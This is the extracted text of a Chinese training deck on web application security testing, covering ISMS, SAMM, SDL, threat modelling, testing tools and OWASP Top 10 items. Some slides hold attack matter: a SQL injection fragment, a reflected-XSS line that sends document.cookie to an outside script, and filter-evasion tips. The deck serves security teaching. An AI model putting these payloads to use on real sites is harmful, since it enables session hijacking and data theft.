Web应用安全测试 WendaHu / Jan 5th, 2016 2 课程内容 信息安全概览 信息安全管理体系 OpenSAMM软件保证成熟度模型 SDL软件安全开发生命周期 安全测试工具种类与市场简介 Web应用常见缺陷种类与实例介绍 OWASP Top 10 代码中的常见缺陷 Fortify安全工具家族简介 WebInspect Fortify SCA Web应用安全测试实战 信息安全概览 4 2014 Year of Data Breaches 1,023,108,267records stolen in 1541data breaches78%more than 2013106severe breaches 5 2014重大安全漏洞 6 各行业数据泄漏占比 7 数据泄漏的起因占比 8 黑客地下产业 虚假身份 黑客教程 信用卡信息 恶意软件 肉机 银行账号 黑客服务 人肉服务 9 “There are only two types of companies: those that have been hacked and those that will be hacked.” Robert S. Mueller, III 6thDirector, FBI “Companies that have been hacked and will be hacked again” 10 信息安全行业 白产/红产 灰产 黑产 监管 行业自律 约定俗成 基础架构安全 网络空间安全 应用安全 就业 资质 道德 人才技术 行业规范 11 信息安全三要素 C AI Privacy Non- repudiation Accountability Authenticity Auditability 12 ISO 9126软件质量模型中的六大软件特性 13 风险 基于风险的企业IT治理思想 风险的识别、分析、评价和处置 应对风险的四类方法：避免、减轻、转移和接受 风险= 资产中的弱点被威胁利用的代价 统一威胁管理 事件管理 14 风险管理示例 风险源风险影响可能性优先级减轻方案 责任人/时间 应急方案 责任人/时间 信息安全管理体系 16 Why ISMS? 结构化的信息安全管理方法 提供独立的评估方法 提供保证 提高信息安全治理水平 提高企业名望 17 ISO27001 ISMS要求 环境 领导 规划 支持 运行 评价 改进 18 ISO27001 控制域 信息安全方针 信息安全组织 人力资源安全 资产管理 访问控制 密码学 物理和环境安全 操作安全 通信安全 系统获取、开发和维护 供应商关系 信息安全事件管理 业务连续性管理中的信息安全 符合性 系统安全测试 系统验收测试 测试数据的保护 19 ISO27001实施举例 安全方针 信息安全 组织 人力资源 安全 资产 管理 访问 控制 密码学 物理和环 境安全 操作 安全 通信 安全 供应商 关系 系统获取、 开发和维护 信息安全 事件管理 业务连 续性 符合性 信 息 安 全 组 织 和 职 责 保 密 制 度 信 息 安 全 意 识 培 养 框 架 信 息 资 产 安 全 管 理 制 度 账 户 安 全 管 理 标 准 远 程 接 入 安 全 标 准 密 钥 管 理 制 度 机 房 管 理 制 度 办 公 环 境 安 全 管 理 制 度 病 毒 防 治 标 准 电 子 邮 件 安 全 管 理 标 准 网 络 安 全 管 理 标 准 应 用 开 发 安 全 标 准 第 三 方 信 息 安 全 管 理 标 准 第 三 方 业 务 安 全 接 入 标 准 安 全 事 件 管 理 标 准 移 动 应 用 开 发 安 全 标 准 灾 难 恢 复 制 度 法 律 法 规 管 理 制 度 办 公 自 动 化 用 户 管 理 条 例 安 全 职 责 考 核 管 理 流 程 移 动 介 质 管 理 流 程 系 统 上 线 安 全 检 查 流 程 备 份 与 恢 复 操 作 流 程 特 权 账 户 安 全 管 理 流 程 重 大 事 件 应 急 预 案 网 络 中 断 应 急 预 案 安全内审 标准 管理评审 制度 文件管理 制度 风险评估 管理制度 纠正预防 管理制度 有效性测 量制度 适用性声明 一级文件 二级文件 三级文件 公司花费数以百万计的美金在防火 墙、加密和访问控制设备上，可这些 钱都被浪费了，因为这些手段中没有 一个着眼于安全链中最薄弱的一环： 人和流程 -凯文米特尼克 OpenSAMM 软件保证成熟度模型 22 SAMM模型 治理构造验证部署 策略与指标教育与指导 政策与合规 安全需求 安全架构威胁评估 设计审核安全测试环境强化 代码审核 缺陷管理运营实现 安全实践 软件开发 业务功能 SAMM概况 从企业的组织与软件开发的核心活动出发 面向软件公司的四大业务功能 每个业务功能三个安全实践 每个安全措施精确定义三个成熟度等级 23 SAMM中的安全测试 第一级第二级第三级 目标 基于实施和软件的需求，建 立流程来执行基本的安全测 试 通过自动化技术使开发过程 中的安全测试更完整和高效 要求基于单个应用程序的安 全测试，以保障部署前的安 全基线 活动 从已有的安全需求中衍生 测试用例 在软件发布时执行渗透测 试 使用自动化测试工具 将安全测试整合进开发流 程中 进行基于单个应用程序的 自动化安全测试 为安全测试建立一个发布 前的检查点 Secure Development Lifecycle 25 安全开发生命周期的理念 仅仅“寻找bug”不能使软件变得安全 减少漏洞出现在设计和代码中的机会 需要决策层的承诺 需要持续改进 需要教育和培训 需要工具与自动化技术 奖惩措施 26 软件开发流程中的安全措施 安全培训 安全政策法规 安全意识培训 安全设计和开发培训 安全测试培训 风险评估和管理 定义安全需求 攻击面分析 威胁建模 安全架构设计 代码安全规范实践 静态代码分析 动态扫描和安全测试 合规性检查 安全检查和评审 增强开发团队能力 基于风险的方法 持续弱点管理和安全改进 27 软件威胁模型 验证性 身份管理与双因素认证 S欺骗 完整性 完整性校验、后门分析 T篡改 不可否认性 建立问责制、追踪日志 R 否认 保密性 加密、信息流管控 I 泄露 可用性 备份、应急响应 D拒绝 授权 统一访问控制 E 提权 威胁常见应对 28 威胁建模示例 SSDP 10 Remote Castle Service 9 SSDP 8 Castle Service 8 Explorer (or rundl132) 2 Local User 1 Shacct 4 Set acct info Get acct info Get acct info Set acct info Feedback Manage Castle Read Castle info Cache Castle info Get version info Set version info Query other Castle info Publish this Castle info Join, leave, Set users props Query users props Get machine password Set psswd 29 适度安全 安全无止境，防护要适度 信息安全也有经济学 所谓的“bad practice” Security through obscurity Security through minority Security through unpopularity Security through obsolescence Security through lack of interest 安全测试工具市场 31 应用安全测试商业工具市场 32 应用安全测试免费工具市场 综合性黑盒测试 ZAPWebScarabBurp Proxy FiddlerMantraNessus 网络测试 Nmapnetcatftester Message AnalyzerWireshark 单项黑盒测试 SQL Map Xenotix Pangolin John the RipperMantra WSFuzzer 白盒审计 PMDFxCop FlawFinder FindBugs Brakeman OWASP Top 10 34 应用程序中风险的形成 资产 功能 威胁主体 攻击 攻击向量 攻击 攻击 弱点 安全弱点 弱点 弱点 控制 安全控制 控制 控制弱点 技术影响业务影响 影响 影响 影响 资产 35 渗透测试方法论 扫描Scanning 痕迹收集Footprinting 枚举Enumeration 钻取接入Gaining Access 提权Escalating Privilege 窃取Pilfering 清除痕迹Covering Tracks 生产后门Creating Back Doors 拒绝服务Denial of Service 36 A1 注入 修补方法 输入过滤 编码特殊字符 避免拼接不可信来源的字符串 漏洞原因 缺乏输入过滤 数据与代码混淆 各种数据格式的互相转换 攻击形式 SQL注入 or 1=1 命令行注入 LDAP注入 XML/JSON注入 XPath注入 负面影响 信息泄漏、丢失、破坏 系统被破坏 越权访问 认证失效 37 SQL注入的方式 Inband: 直接返回数据或结果 Out-of-band: 从其他途径输出数据或结果 Blind: 盲注，通过推理来判断结果 38 A2 失效的身份认证和会话管理 修补方法 按照业界最佳实践来构建一套统 一的认证和会话管理系统 漏洞原因 会话凭证暴露在不该出现的地方 会话凭证固化、易猜测、不失效 认证凭证传输和存储的方式不安 全 攻击形式 会话劫持 jsessionid=2P0OC2JDPXM0OQSNDL PSKHCJUN2JV?dest=Hawaii 猜测、嗅探、偷窃认证凭证 负面影响 认证失效 会话劫持 用户信息泄漏 39 认证机制的常见弱点 认证凭证的不安全传输 弱认证凭证 不安全的锁定机制 可绕过的认证机制 记住密码功能 浏览器缓存 弱密码机制 40 会话管理的常见弱点 弱会话ID 不安全的cookie属性 会话定置 不安全的登出和会话过期 41 A3 跨站脚本 修补方法 输入过滤 输出过滤 漏洞原因 缺乏输入过滤 缺乏输出过滤 数据与代码混淆 攻击形式 反射型跨站脚本 cc=document.location=http:/www. bin/cookie.cgi?foo=+document.cookie 持久型跨站脚本 DOM跨站脚本 负面影响 会话劫持 用户信息泄漏 网站破坏 42 Same Origin Policy 不同源的页面不可交互 协议、端口、域名都一致的两个URL才被认为是同源的 43 跨站脚本漏洞的利用 可插入内容 直接插入标签 插入行内脚本 插入外部脚本文件 插入HTML内容 绕过检测的手段 大小写变化 URL编码 HTML编码 eval() 特殊字符和非法HTML语法 针对检测手段构造特殊语句 44 A4 不安全的直接对象引用 修补方法 完善授权机制 显式地接受请求参数 漏洞原因 授权机制未能覆盖所有对象 无意识地接受请求参数